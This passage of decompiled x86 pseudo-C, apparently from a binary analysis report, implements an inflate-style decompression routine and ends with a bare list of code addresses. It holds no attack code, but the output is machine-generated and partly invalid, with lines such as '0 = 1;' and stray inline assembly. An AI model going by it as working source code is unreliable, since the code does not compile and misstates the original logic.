                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L130:
                                                                            											 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                            											__esi[3] = __esi[3] + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                            											__ecx = __eax;
                                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            											__ebx = __ebx - __eax;
                                                                            											__eflags = __ebx;
                                                                            											 *__esi = 5;
                                                                            											goto L131;
                                                                            										case 5:
                                                                            											L131:
                                                                            											__eax =  *(__ebp - 0x30);
                                                                            											__edx = __esi[3];
                                                                            											__eax = __eax - __esi;
                                                                            											__ecx = __eax - __esi - 0x1ba0;
                                                                            											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                            											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                            												__ecx = __eax;
                                                                            												__ecx = __eax - __edx;
                                                                            												__eflags = __ecx;
                                                                            											} else {
                                                                            												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                            												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                            												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                            											}
                                                                            											__eflags = __esi[1];
                                                                            											 *(__ebp - 0x20) = __ecx;
                                                                            											if(__esi[1] != 0) {
                                                                            												L135:
                                                                            												__edi =  *(__ebp - 0x2c);
                                                                            												do {
                                                                            													L136:
                                                                            													__eflags = __edi;
                                                                            													if(__edi != 0) {
                                                                            														goto L152;
                                                                            													}
                                                                            													L137:
                                                                            													__edi = __esi[0x26e8];
                                                                            													__eflags = __eax - __edi;
                                                                            													if(__eax != __edi) {
                                                                            														L143:
                                                                            														__esi[0x26ea] = __eax;
                                                                            														__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
                                                                            														__eax = __esi[0x26ea];
                                                                            														__ecx = __esi[0x26e9];
                                                                            														__eflags = __eax - __ecx;
                                                                            														 *(__ebp - 0x30) = __eax;
                                                                            														if(__eax >= __ecx) {
                                                                            															__edi = __esi[0x26e8];
                                                                            															__edi = __esi[0x26e8] - __eax;
                                                                            															__eflags = __edi;
                                                                            														} else {
                                                                            															__ecx = __ecx - __eax;
                                                                            															__edi = __ecx - __eax - 1;
                                                                            														}
                                                                            														__edx = __esi[0x26e8];
                                                                            														__eflags = __eax - __edx;
                                                                            														 *(__ebp - 8) = __edx;
                                                                            														if(__eax == __edx) {
                                                                            															__edx =  &(__esi[0x6e8]);
                                                                            															__eflags = __ecx - __edx;
                                                                            															if(__ecx != __edx) {
                                                                            																__eax = __edx;
                                                                            																__eflags = __eax - __ecx;
                                                                            																 *(__ebp - 0x30) = __eax;
                                                                            																if(__eax >= __ecx) {
                                                                            																	__edi =  *(__ebp - 8);
                                                                            																	__edi =  *(__ebp - 8) - __eax;
                                                                            																	__eflags = __edi;
                                                                            																} else {
                                                                            																	__ecx = __ecx - __eax;
                                                                            																	__edi = __ecx;
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            														__eflags = __edi;
                                                                            														if(__edi == 0) {
                                                                            															goto L184;
                                                                            														} else {
                                                                            															goto L152;
                                                                            														}
                                                                            													}
                                                                            													L138:
                                                                            													__ecx = __esi[0x26e9];
                                                                            													__edx =  &(__esi[0x6e8]);
                                                                            													__eflags = __ecx - __edx;
                                                                            													if(__ecx == __edx) {
                                                                            														goto L143;
                                                                            													}
                                                                            													L139:
                                                                            													__eax = __edx;
                                                                            													__eflags = __eax - __ecx;
                                                                            													if(__eax >= __ecx) {
                                                                            														__edi = __edi - __eax;
                                                                            														__eflags = __edi;
                                                                            													} else {
                                                                            														__ecx = __ecx - __eax;
                                                                            														__edi = __ecx;
                                                                            													}
                                                                            													__eflags = __edi;
                                                                            													if(__edi == 0) {
                                                                            														goto L143;
                                                                            													}
                                                                            													L152:
                                                                            													__ecx =  *(__ebp - 0x20);
                                                                            													 *__eax =  *__ecx;
                                                                            													__eax = __eax + 1;
                                                                            													__ecx = __ecx + 1;
                                                                            													__edi = __edi - 1;
                                                                            													__eflags = __ecx - __esi[0x26e8];
                                                                            													 *(__ebp - 0x30) = __eax;
                                                                            													 *(__ebp - 0x20) = __ecx;
                                                                            													 *(__ebp - 0x2c) = __edi;
                                                                            													if(__ecx == __esi[0x26e8]) {
                                                                            														__ecx =  &(__esi[0x6e8]);
                                                                            														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                            													}
                                                                            													_t357 =  &(__esi[1]);
                                                                            													 *_t357 = __esi[1] - 1;
                                                                            													__eflags =  *_t357;
                                                                            												} while ( *_t357 != 0);
                                                                            											}
                                                                            											goto L23;
                                                                            										case 6:
                                                                            											L156:
                                                                            											__eax =  *(__ebp - 0x2c);
                                                                            											__edi =  *(__ebp - 0x30);
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												L173:
                                                                            												__cl = __esi[2];
                                                                            												 *__edi = __cl;
                                                                            												__edi = __edi + 1;
                                                                            												__eax = __eax - 1;
                                                                            												 *(__ebp - 0x30) = __edi;
                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                            												goto L23;
                                                                            											}
                                                                            											L157:
                                                                            											__ecx = __esi[0x26e8];
                                                                            											__eflags = __edi - __ecx;
                                                                            											if(__edi != __ecx) {
                                                                            												L164:
                                                                            												__esi[0x26ea] = __edi;
                                                                            												__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
                                                                            												__edi = __esi[0x26ea];
                                                                            												__ecx = __esi[0x26e9];
                                                                            												__eflags = __edi - __ecx;
                                                                            												 *(__ebp - 0x30) = __edi;
                                                                            												if(__edi >= __ecx) {
                                                                            													__eax = __esi[0x26e8];
                                                                            													__eax = __esi[0x26e8] - __edi;
                                                                            													__eflags = __eax;
                                                                            												} else {
                                                                            													__ecx = __ecx - __edi;
                                                                            													__eax = __ecx - __edi - 1;
                                                                            												}
                                                                            												__edx = __esi[0x26e8];
                                                                            												__eflags = __edi - __edx;
                                                                            												 *(__ebp - 8) = __edx;
                                                                            												if(__edi == __edx) {
                                                                            													__edx =  &(__esi[0x6e8]);
                                                                            													__eflags = __ecx - __edx;
                                                                            													if(__ecx != __edx) {
                                                                            														__edi = __edx;
                                                                            														__eflags = __edi - __ecx;
                                                                            														 *(__ebp - 0x30) = __edi;
                                                                            														if(__edi >= __ecx) {
                                                                            															__eax =  *(__ebp - 8);
                                                                            															__eax =  *(__ebp - 8) - __edi;
                                                                            															__eflags = __eax;
                                                                            														} else {
                                                                            															__ecx = __ecx - __edi;
                                                                            															__eax = __ecx;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            												__eflags = __eax;
                                                                            												if(__eax == 0) {
                                                                            													goto L184;
                                                                            												} else {
                                                                            													goto L173;
                                                                            												}
                                                                            											}
                                                                            											L158:
                                                                            											__eax = __esi[0x26e9];
                                                                            											__edx =  &(__esi[0x6e8]);
                                                                            											__eflags = __eax - __edx;
                                                                            											if (__eax == __edx) goto L164;
                                                                            											asm("adc ecx, [ebx+0x73f83bfa]");
                                                                            										case 7:
                                                                            											L174:
                                                                            											__eflags = __ebx - 7;
                                                                            											if(__ebx > 7) {
                                                                            												__ebx = __ebx - 8;
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                            												_t380 = __ebp - 0x38;
                                                                            												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                            												__eflags =  *_t380;
                                                                            											}
                                                                            											goto L176;
                                                                            										case 8:
                                                                            											L4:
                                                                            											while(_t425 < 3) {
                                                                            												if( *(_t448 - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												} else {
                                                                            													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                            													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                            													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                            													_t425 = _t425 + 8;
                                                                            													continue;
                                                                            												}
                                                                            											}
                                                                            											_t425 = _t425 - 3;
                                                                            											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                            											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                            											asm("sbb ecx, ecx");
                                                                            											_t408 = _t406 >> 1;
                                                                            											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                            											if(_t408 == 0) {
                                                                            												L24:
                                                                            												 *_t446 = 9;
                                                                            												_t436 = _t425 & 0x00000007;
                                                                            												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                            												_t425 = _t425 - _t436;
                                                                            												goto L181;
                                                                            											}
                                                                            											L6:
                                                                            											_t411 = _t408 - 1;
                                                                            											if(_t411 == 0) {
                                                                            												L13:
                                                                            												__eflags =  *0x432e70;
                                                                            												if( *0x432e70 != 0) {
                                                                            													L22:
                                                                            													_t412 =  *0x40a5c8; // 0x9
                                                                            													_t446[4] = _t412;
                                                                            													_t413 =  *0x40a5cc; // 0x5
                                                                            													_t446[4] = _t413;
                                                                            													_t414 =  *0x431cec; // 0x4325f0
                                                                            													_t446[5] = _t414;
                                                                            													_t415 =  *0x431ce8; // 0x432df0
                                                                            													_t446[6] = _t415;
                                                                            													L23:
                                                                            													 *_t446 =  *_t446 & 0x00000000;
                                                                            													goto L181;
                                                                            												} else {
                                                                            													_t26 = _t448 - 8;
                                                                            													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                            													__eflags =  *_t26;
                                                                            													_t416 = 0x431cf0;
                                                                            													do {
                                                                            														L15:
                                                                            														__eflags = _t416 - 0x431f2c;
                                                                            														_t438 = 8;
                                                                            														if(_t416 > 0x431f2c) {
                                                                            															__eflags = _t416 - 0x4320f0;
                                                                            															if(_t416 >= 0x4320f0) {
                                                                            																__eflags = _t416 - 0x432150;
                                                                            																if(_t416 < 0x432150) {
                                                                            																	_t438 = 7;
                                                                            																}
                                                                            															} else {
                                                                            																_t438 = 9;
                                                                            															}
                                                                            														}
                                                                            														L20:
                                                                            														 *_t416 = _t438;
                                                                            														_t416 = _t416 + 4;
                                                                            														__eflags = _t416 - 0x432170;
                                                                            													} while (_t416 < 0x432170);
                                                                            													E004072B4(0x431cf0, 0x120, 0x101, 0x4084e0, 0x408520, 0x431cec, 0x40a5c8, 0x4325f0, _t448 - 8);
                                                                            													_push(0x1e);
                                                                            													_pop(_t440);
                                                                            													_push(5);
                                                                            													_pop(_t419);
                                                                            													memset(0x431cf0, _t419, _t440 << 2);
                                                                            													_t450 = _t450 + 0xc;
                                                                            													_t442 = 0x431cf0 + _t440;
                                                                            													E004072B4(0x431cf0, 0x1e, 0, 0x408560, 0x40859c, 0x431ce8, 0x40a5cc, 0x4325f0, _t448 - 8);
                                                                            													 *0x432e70 =  *0x432e70 + 1;
                                                                            													__eflags =  *0x432e70;
                                                                            													goto L22;
                                                                            												}
                                                                            											}
                                                                            											L7:
                                                                            											_t423 = _t411 - 1;
                                                                            											if(_t423 == 0) {
                                                                            												 *_t446 = 0xb;
                                                                            												goto L181;
                                                                            											}
                                                                            											L8:
                                                                            											if(_t423 != 1) {
                                                                            												goto L181;
                                                                            											}
                                                                            											goto L9;
                                                                            										case 9:
                                                                            											while(1) {
                                                                            												L27:
                                                                            												__eflags = __ebx - 0x20;
                                                                            												if(__ebx >= 0x20) {
                                                                            													break;
                                                                            												}
                                                                            												L25:
                                                                            												__eflags =  *(__ebp - 0x34);
                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                            													goto L183;
                                                                            												}
                                                                            												L26:
                                                                            												__eax =  *(__ebp - 0x38);
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            												__ecx = __ebx;
                                                                            												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            												__ebx = __ebx + 8;
                                                                            												__eflags = __ebx;
                                                                            											}
                                                                            											L28:
                                                                            											__eax =  *(__ebp - 0x40);
                                                                            											__ebx = 0;
                                                                            											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                            											 *(__ebp - 0x40) = 0;
                                                                            											__eflags = __eax;
                                                                            											__esi[1] = __eax;
                                                                            											if(__eax == 0) {
                                                                            												goto L53;
                                                                            											}
                                                                            											L29:
                                                                            											_push(0xa);
                                                                            											_pop(__eax);
                                                                            											goto L54;
                                                                            										case 0xa:
                                                                            											L30:
                                                                            											__eflags =  *(__ebp - 0x34);
                                                                            											if( *(__ebp - 0x34) == 0) {
                                                                            												goto L183;
                                                                            											}
                                                                            											L31:
                                                                            											__eax =  *(__ebp - 0x2c);
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												L48:
                                                                            												__eflags = __eax -  *(__ebp - 0x34);
                                                                            												if(__eax >=  *(__ebp - 0x34)) {
                                                                            													__eax =  *(__ebp - 0x34);
                                                                            												}
                                                                            												__ecx = __esi[1];
                                                                            												__eflags = __ecx - __eax;
                                                                            												__edi = __ecx;
                                                                            												if(__ecx >= __eax) {
                                                                            													__edi = __eax;
                                                                            												}
                                                                            												__eax = E00405D2F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                            												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                            												_t80 =  &(__esi[1]);
                                                                            												 *_t80 = __esi[1] - __edi;
                                                                            												__eflags =  *_t80;
                                                                            												if( *_t80 == 0) {
                                                                            													L53:
                                                                            													__eax = __esi[0x145];
                                                                            													L54:
                                                                            													 *__esi = __eax;
                                                                            												}
                                                                            												goto L181;
                                                                            											}
                                                                            											L32:
                                                                            											__ecx = __esi[0x26e8];
                                                                            											__edx =  *(__ebp - 0x30);
                                                                            											__eflags = __edx - __ecx;
                                                                            											if(__edx != __ecx) {
                                                                            												L38:
                                                                            												__esi[0x26ea] = __edx;
                                                                            												__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
                                                                            												__edx = __esi[0x26ea];
                                                                            												__ecx = __esi[0x26e9];
                                                                            												__eflags = __edx - __ecx;
                                                                            												 *(__ebp - 0x30) = __edx;
                                                                            												if(__edx >= __ecx) {
                                                                            													__eax = __esi[0x26e8];
                                                                            													__eax = __esi[0x26e8] - __edx;
                                                                            													__eflags = __eax;
                                                                            												} else {
                                                                            													__ecx = __ecx - __edx;
                                                                            													__eax = __ecx - __edx - 1;
                                                                            												}
                                                                            												__edi = __esi[0x26e8];
                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                            												__eflags = __edx - __edi;
                                                                            												if(__edx == __edi) {
                                                                            													__edx =  &(__esi[0x6e8]);
                                                                            													__eflags = __edx - __ecx;
                                                                            													if(__eflags != 0) {
                                                                            														 *(__ebp - 0x30) = __edx;
                                                                            														if(__eflags >= 0) {
                                                                            															__edi = __edi - __edx;
                                                                            															__eflags = __edi;
                                                                            															__eax = __edi;
                                                                            														} else {
                                                                            															__ecx = __ecx - __edx;
                                                                            															__eax = __ecx;
                                                                            														}
                                                                            														 *(__ebp - 0x2c) = __eax;
                                                                            													}
                                                                            												}
                                                                            												__eflags = __eax;
                                                                            												if(__eax == 0) {
                                                                            													goto L184;
                                                                            												} else {
                                                                            													goto L48;
                                                                            												}
                                                                            											}
                                                                            											L33:
                                                                            											__eax = __esi[0x26e9];
                                                                            											__edi =  &(__esi[0x6e8]);
                                                                            											__eflags = __eax - __edi;
                                                                            											if(__eax == __edi) {
                                                                            												goto L38;
                                                                            											}
                                                                            											L34:
                                                                            											__edx = __edi;
                                                                            											__eflags = __edx - __eax;
                                                                            											 *(__ebp - 0x30) = __edx;
                                                                            											if(__edx >= __eax) {
                                                                            												__ecx = __ecx - __edx;
                                                                            												__eflags = __ecx;
                                                                            												__eax = __ecx;
                                                                            											} else {
                                                                            												__eax = __eax - __edx;
                                                                            												__eax = __eax - 1;
                                                                            											}
                                                                            											__eflags = __eax;
                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                            											if(__eax != 0) {
                                                                            												goto L48;
                                                                            											} else {
                                                                            												goto L38;
                                                                            											}
                                                                            										case 0xb:
                                                                            											goto L56;
                                                                            										case 0xc:
                                                                            											L60:
                                                                            											__esi[1] = __esi[1] >> 0xa;
                                                                            											__eax = (__esi[1] >> 0xa) + 4;
                                                                            											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                            												goto L68;
                                                                            											}
                                                                            											goto L61;
                                                                            										case 0xd:
                                                                            											while(1) {
                                                                            												L93:
                                                                            												__eax = __esi[1];
                                                                            												__ecx = __esi[2];
                                                                            												__edx = __eax;
                                                                            												__eax = __eax & 0x0000001f;
                                                                            												__edx = __edx >> 5;
                                                                            												__eax = __edx + __eax + 0x102;
                                                                            												__eflags = __esi[2] - __eax;
                                                                            												if(__esi[2] >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L73:
                                                                            												__eax = __esi[0x143];
                                                                            												while(1) {
                                                                            													L76:
                                                                            													__eflags = __ebx - __eax;
                                                                            													if(__ebx >= __eax) {
                                                                            														break;
                                                                            													}
                                                                            													L74:
                                                                            													__eflags =  *(__ebp - 0x34);
                                                                            													if( *(__ebp - 0x34) == 0) {
                                                                            														goto L183;
                                                                            													}
                                                                            													L75:
                                                                            													__ecx =  *(__ebp - 0x38);
                                                                            													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            													__ecx = __ebx;
                                                                            													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            													__ebx = __ebx + 8;
                                                                            													__eflags = __ebx;
                                                                            												}
                                                                            												L77:
                                                                            												__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
                                                                            												__eax = __eax &  *(__ebp - 0x40);
                                                                            												__ecx = __esi[0x144];
                                                                            												__eax = __esi[0x144] + __eax * 4;
                                                                            												__edx =  *(__eax + 1) & 0x000000ff;
                                                                            												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                            												__eflags = __eax - 0x10;
                                                                            												 *(__ebp - 0x14) = __eax;
                                                                            												if(__eax >= 0x10) {
                                                                            													L79:
                                                                            													__eflags = __eax - 0x12;
                                                                            													if(__eax != 0x12) {
                                                                            														__eax = __eax + 0xfffffff2;
                                                                            														 *(__ebp - 8) = 3;
                                                                            													} else {
                                                                            														_push(7);
                                                                            														 *(__ebp - 8) = 0xb;
                                                                            														_pop(__eax);
                                                                            													}
                                                                            													while(1) {
                                                                            														L84:
                                                                            														__ecx = __eax + __edx;
                                                                            														__eflags = __ebx - __eax + __edx;
                                                                            														if(__ebx >= __eax + __edx) {
                                                                            															break;
                                                                            														}
                                                                            														L82:
                                                                            														__eflags =  *(__ebp - 0x34);
                                                                            														if( *(__ebp - 0x34) == 0) {
                                                                            															goto L183;
                                                                            														}
                                                                            														L83:
                                                                            														__ecx =  *(__ebp - 0x38);
                                                                            														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            														__ecx = __ebx;
                                                                            														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            														__ebx = __ebx + 8;
                                                                            														__eflags = __ebx;
                                                                            													}
                                                                            													L85:
                                                                            													__ecx = __edx;
                                                                            													__ebx = __ebx - __edx;
                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            													 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                            													__edx =  *(__ebp - 8);
                                                                            													__ebx = __ebx - __eax;
                                                                            													__edx =  *(__ebp - 8) + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                            													__ecx = __eax;
                                                                            													__eax = __esi[1];
                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            													__ecx = __esi[2];
                                                                            													__eax = __eax >> 5;
                                                                            													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                            													__eax = __eax & 0x0000001f;
                                                                            													__eax = __edi + __eax + 0x102;
                                                                            													__edi = __edx + __ecx;
                                                                            													__eflags = __edx + __ecx - __eax;
                                                                            													if(__edx + __ecx > __eax) {
                                                                            														goto L9;
                                                                            													}
                                                                            													L86:
                                                                            													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                            													if( *(__ebp - 0x14) != 0x10) {
                                                                            														L89:
                                                                            														__edi = 0;
                                                                            														__eflags = 0;
                                                                            														L90:
                                                                            														__eax = __esi + 0xc + __ecx * 4;
                                                                            														do {
                                                                            															L91:
                                                                            															 *__eax = __edi;
                                                                            															__ecx = __ecx + 1;
                                                                            															__eax = __eax + 4;
                                                                            															__edx = __edx - 1;
                                                                            															__eflags = __edx;
                                                                            														} while (__edx != 0);
                                                                            														__esi[2] = __ecx;
                                                                            														continue;
                                                                            													}
                                                                            													L87:
                                                                            													__eflags = __ecx - 1;
                                                                            													if(__ecx < 1) {
                                                                            														goto L9;
                                                                            													}
                                                                            													L88:
                                                                            													__edi =  *(__esi + 8 + __ecx * 4);
                                                                            													goto L90;
                                                                            												}
                                                                            												L78:
                                                                            												__ecx = __edx;
                                                                            												__ebx = __ebx - __edx;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            												__ecx = __esi[2];
                                                                            												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                            												__esi[2] = __esi[2] + 1;
                                                                            											}
                                                                            											L94:
                                                                            											__eax = __esi[1];
                                                                            											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                            											__edi = __eax;
                                                                            											__eax = __eax >> 5;
                                                                            											__edi = __edi & 0x0000001f;
                                                                            											__ecx = 0x101;
                                                                            											__eax = __eax & 0x0000001f;
                                                                            											__edi = __edi + 0x101;
                                                                            											__eax = __eax + 1;
                                                                            											__edx = __ebp - 0xc;
                                                                            											 *(__ebp - 0x14) = __eax;
                                                                            											 &(__esi[0x148]) = __ebp - 4;
                                                                            											 *(__ebp - 4) = 9;
                                                                            											__ebp - 0x18 =  &(__esi[3]);
                                                                            											 *(__ebp - 0x10) = 6;
                                                                            											__eax = E004072B4( &(__esi[3]), __edi, 0x101, 0x4084e0, 0x408520, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                            											__eflags =  *(__ebp - 4);
                                                                            											if( *(__ebp - 4) == 0) {
                                                                            												__eax = __eax | 0xffffffff;
                                                                            												__eflags = __eax;
                                                                            											}
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												goto L9;
                                                                            											} else {
                                                                            												L97:
                                                                            												__ebp - 0xc =  &(__esi[0x148]);
                                                                            												__ebp - 0x10 = __ebp - 0x1c;
                                                                            												__eax = __esi + 0xc + __edi * 4;
                                                                            												__eax = E004072B4(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408560, 0x40859c, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                            												__eflags = __eax;
                                                                            												if(__eax != 0) {
                                                                            													goto L9;
                                                                            												}
                                                                            												L98:
                                                                            												__eax =  *(__ebp - 0x10);
                                                                            												__eflags =  *(__ebp - 0x10);
                                                                            												if( *(__ebp - 0x10) != 0) {
                                                                            													L100:
                                                                            													__cl =  *(__ebp - 4);
                                                                            													 *__esi =  *__esi & 0x00000000;
                                                                            													__eflags =  *__esi;
                                                                            													__esi[4] = __al;
                                                                            													__eax =  *(__ebp - 0x18);
                                                                            													__esi[5] =  *(__ebp - 0x18);
                                                                            													__eax =  *(__ebp - 0x1c);
                                                                            													__esi[4] = __cl;
                                                                            													__esi[6] =  *(__ebp - 0x1c);
                                                                            													goto L101;
                                                                            												}
                                                                            												L99:
                                                                            												__eflags = __edi - 0x101;
                                                                            												if(__edi > 0x101) {
                                                                            													goto L9;
                                                                            												}
                                                                            												goto L100;
                                                                            											}
                                                                            										case 0xe:
                                                                            											goto L9;
                                                                            										case 0xf:
                                                                            											L176:
                                                                            											__eax =  *(__ebp - 0x30);
                                                                            											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                            											__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
                                                                            											__ecx = __esi[0x26ea];
                                                                            											__edx = __esi[0x26e9];
                                                                            											__eflags = __ecx - __edx;
                                                                            											 *(__ebp - 0x30) = __ecx;
                                                                            											if(__ecx >= __edx) {
                                                                            												__eax = __esi[0x26e8];
                                                                            												__eax = __esi[0x26e8] - __ecx;
                                                                            												__eflags = __eax;
                                                                            											} else {
                                                                            												__edx = __edx - __ecx;
                                                                            												__eax = __edx - __ecx - 1;
                                                                            											}
                                                                            											__eflags = __ecx - __edx;
                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                            											if(__ecx != __edx) {
                                                                            												L184:
                                                                            												__edi = 0;
                                                                            												goto L10;
                                                                            											} else {
                                                                            												L180:
                                                                            												__eax = __esi[0x145];
                                                                            												__eflags = __eax - 8;
                                                                            												 *__esi = __eax;
                                                                            												if(__eax != 8) {
                                                                            													L185:
                                                                            													0 = 1;
                                                                            													goto L10;
                                                                            												}
                                                                            												goto L181;
                                                                            											}
                                                                            									}
                                                                            								}
                                                                            								L182:
                                                                            								goto L9;
                                                                            							}
                                                                            							L70:
                                                                            							if( *__edi == __eax) {
                                                                            								goto L72;
                                                                            							}
                                                                            							L71:
                                                                            							__esi[2] = __esi[2] & __eax;
                                                                            							 *__esi = 0xd;
                                                                            							goto L93;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				L183:
                                                                            				_t443 = 0;
                                                                            				_t446[0x147] =  *(_t448 - 0x40);
                                                                            				_t446[0x146] = _t425;
                                                                            				( *(_t448 + 8))[1] = 0;
                                                                            				goto L11;
                                                                            			}









                                                                            0x00406e5a
                                                                            0x00406e5d
                                                                            0x00406e5f
                                                                            0x00406e62
                                                                            0x00406e64
                                                                            0x00406e78
                                                                            0x00406e78
                                                                            0x00406e7b
                                                                            0x00406e95
                                                                            0x00406e95
                                                                            0x00406e98
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e9e
                                                                            0x00406e9e
                                                                            0x00406ea1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ea7
                                                                            0x00406ea7
                                                                            0x00000000
                                                                            0x00406ea7
                                                                            0x00406e7d
                                                                            0x00406e80
                                                                            0x00406e87
                                                                            0x00406e8a
                                                                            0x00000000
                                                                            0x00406e8a
                                                                            0x00406e66
                                                                            0x00406e6a
                                                                            0x00406e6d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406eb2
                                                                            0x00406eb2
                                                                            0x00406ed7
                                                                            0x00406ed7
                                                                            0x00406ed7
                                                                            0x00406ed9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406eb7
                                                                            0x00406eb7
                                                                            0x00406ebb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ec1
                                                                            0x00406ec1
                                                                            0x00406ec4
                                                                            0x00406ec7
                                                                            0x00406eca
                                                                            0x00406ecc
                                                                            0x00406ece
                                                                            0x00406ed1
                                                                            0x00406ed4
                                                                            0x00406ed4
                                                                            0x00406ed4
                                                                            0x00406edb
                                                                            0x00406ee3
                                                                            0x00406ee6
                                                                            0x00406ee9
                                                                            0x00406eeb
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00406ef0
                                                                            0x00406ef4
                                                                            0x00406ef7
                                                                            0x00406efa
                                                                            0x00406efd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f03
                                                                            0x00406f03
                                                                            0x00406f28
                                                                            0x00406f28
                                                                            0x00406f28
                                                                            0x00406f2a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f08
                                                                            0x00406f08
                                                                            0x00406f0c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f15
                                                                            0x00406f18
                                                                            0x00406f1b
                                                                            0x00406f1d
                                                                            0x00406f1f
                                                                            0x00406f22
                                                                            0x00406f25
                                                                            0x00406f25
                                                                            0x00406f25
                                                                            0x00406f2c
                                                                            0x00406f2c
                                                                            0x00406f34
                                                                            0x00406f37
                                                                            0x00406f3a
                                                                            0x00406f3d
                                                                            0x00406f41
                                                                            0x00406f44
                                                                            0x00406f46
                                                                            0x00406f49
                                                                            0x00406f4c
                                                                            0x00406f66
